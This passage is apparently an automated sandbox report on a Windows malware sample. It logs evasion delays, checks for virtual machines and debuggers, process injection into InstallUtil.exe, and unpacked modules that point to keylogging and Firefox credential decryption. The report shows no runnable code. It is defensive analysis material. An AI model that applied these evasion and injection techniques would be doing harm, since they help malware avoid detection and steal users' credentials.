Malware Analysis System Evasion

Source: Yara match	File source: Process Memory Space: pbCN4g6sN5.exe PID: 5696, type: MEMORYSTR
Source: C:\Users\user\Desktop\pbCN4g6sN5.exe	Section loaded: OutputDebugStringW count: 1938
Source: C:\Users\user\Desktop\pbCN4g6sN5.exe	Memory allocated: A10000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\pbCN4g6sN5.exe	Memory allocated: 2550000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\pbCN4g6sN5.exe	Memory allocated: 2390000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\pbCN4g6sN5.exe	Memory allocated: 7CC0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\pbCN4g6sN5.exe	Memory allocated: 8CC0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\pbCN4g6sN5.exe	Memory allocated: 8EB0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\pbCN4g6sN5.exe	Memory allocated: 9EB0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\pbCN4g6sN5.exe	Memory allocated: A270000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\pbCN4g6sN5.exe	Memory allocated: B270000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\pbCN4g6sN5.exe	Memory allocated: C270000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 12F0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2DC0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 4DC0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\pbCN4g6sN5.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599867
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599531
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599421
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599203
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599077
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598851
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598734
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598625
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598504
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598375
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598265
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598047
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597937
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597827
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597718
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597281
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597062
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596953
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596843
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596734
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596625
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596515
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596406
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596297
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596187
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595531
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595422
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595203
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595093
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594984
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594547
Source: C:\Users\user\Desktop\pbCN4g6sN5.exe	Window / User API: threadDelayed 8576
Source: C:\Users\user\Desktop\pbCN4g6sN5.exe	Window / User API: threadDelayed 1255
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 1670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 8186
Source: C:\Users\user\Desktop\pbCN4g6sN5.exe TID: 6380	Thread sleep time: -32281802128991695s >= -30000s
Source: C:\Users\user\Desktop\pbCN4g6sN5.exe TID: 6380	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692	Thread sleep time: -23980767295822402s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692	Thread sleep time: -600000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7696	Thread sleep count: 1670 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -599867s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7696Thread sleep count: 8186 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -599750s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -599640s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -599531s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -599421s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -599312s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -599203s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -599077s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -598968s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -598851s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -598734s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -598625s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -598504s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -598375s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -598265s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -598156s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -598047s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -597937s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -597827s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -597718s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -597609s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -597500s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -597390s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -597281s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -597170s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -597062s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -596953s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -596843s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -596734s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -596625s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -596515s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -596406s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -596297s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -596187s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -596078s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -595968s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -595859s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -595750s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -595640s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -595531s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -595422s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -595312s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -595203s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -595093s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -594984s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -594875s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -594765s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -594656s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -594547s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599867Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599750Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599640Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599531Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599421Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599312Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599077Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598968Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598851Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598734Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598625Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598504Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598375Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598265Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598156Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598047Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597937Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597827Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597718Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597609Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597500Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597390Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597281Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597170Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597062Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596953Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596843Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596734Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596625Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596515Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596406Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596297Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596187Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596078Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595968Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595750Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595640Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595531Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595422Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595312Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595093Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594547Jump to behavior
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2383848177.0000000004B30000.00000004.08000000.00040000.00000000.sdmp, pbCN4g6sN5.exe, 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VBoxTray
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1220104579GSOFTWARE\VMware, Inc.\VMware VGAuth
                    Source: InstallUtil.exe, 00000005.00000002.2901449458.0000000000F09000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Code function: 0_2_00A1B51C CheckRemoteDebuggerPresent,0_2_00A1B51C
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Process queried: DebugPort
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Process queried: DebugPort
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Process token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: 0.2.pbCN4g6sN5.exe.35df6d0.2.raw.unpack, COVID19.cs | Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                    Source: 0.2.pbCN4g6sN5.exe.35df6d0.2.raw.unpack, FFDecryptor.cs | Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                    Source: 0.2.pbCN4g6sN5.exe.35df6d0.2.raw.unpack, FFDecryptor.cs | Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 444000
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 446000
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: C8E008
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Users\user\Desktop\pbCN4g6sN5.exe VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
